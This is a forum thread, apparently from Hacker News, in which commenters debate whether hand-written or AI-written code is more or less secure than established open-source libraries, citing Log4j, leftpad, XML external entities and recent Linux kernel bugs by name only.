> we're entering a more hardened era of software
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
If I hand roll my logging library, I unlikely include automatic LDAP request based on message text (infamous Log4j vulnerability).
I’m seeing a lot of similar things during code reviews of substantially LLM-produced codebases now. Half-baked bad idea that probably leaked from training sets.
That particular vulnerability, sure, but there's lots of ways to make mistakes.
While agreeing, it also changes the mathematics of it: if a bad actor wants to hack me specifically now they have to write custom code that targets my software after figuring out what it _is_. This swaps the asymmetry around: instead of one bad actor writing an exploit for all the world (and those exploits being even harder to find), you have to hate me specifically.
Admittedly, not hard to do, but it could save some other folks.
Typically when hand-rolling code you implement only what you require for your use-case, while a library will be more general purpose. As a consequence of doing more, have more code and more bugs.
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
Yes, a lot hinges on how little you can get away with implementing for your use case. If you have an XML config file with 3 settings in it, you probably won't need to implement handling of external entities the way a full XML parsing library would, which will close off an entire class of attendant vulnerabilities.
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge doses properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
This argument goes even further. If you have only 3 settings, why does it need to be an xml file?
ETA: I'm not saying it has to, I'm saying it's possible to imagine reasons that would justify this decision in some cases.
Because it might grow in future and you want to allow flexibility for that, because it might be the input to or output from some external system that requires XML, because your team might have standardised on always using XML config files, because introducing yet another custom plain text file format just creates unnecessary cognitive load for everyone who has to use it are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
>there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did
Have you read this old code? It's terrible and written with no care at all to security often in C. AI is much much better at writing code.
Do you have a specific library in mind? I think it would have to be an ancient, unmaintained C library.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
> even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel
There have been two LPE vulnerability and exploits in the Linux kernel announced today. After the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
One. "Copy Fail 2" and "Dirty Frag" are the same thing.
And consideing the size of the kenel, I call this stupendously good.
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Sure, I didn't mean to say that these examples are guaranteed 100% safe -- just that I trust them to be enormously more safe than software that accomplishes the same task that was hand-written by either a human or an an LLM last week.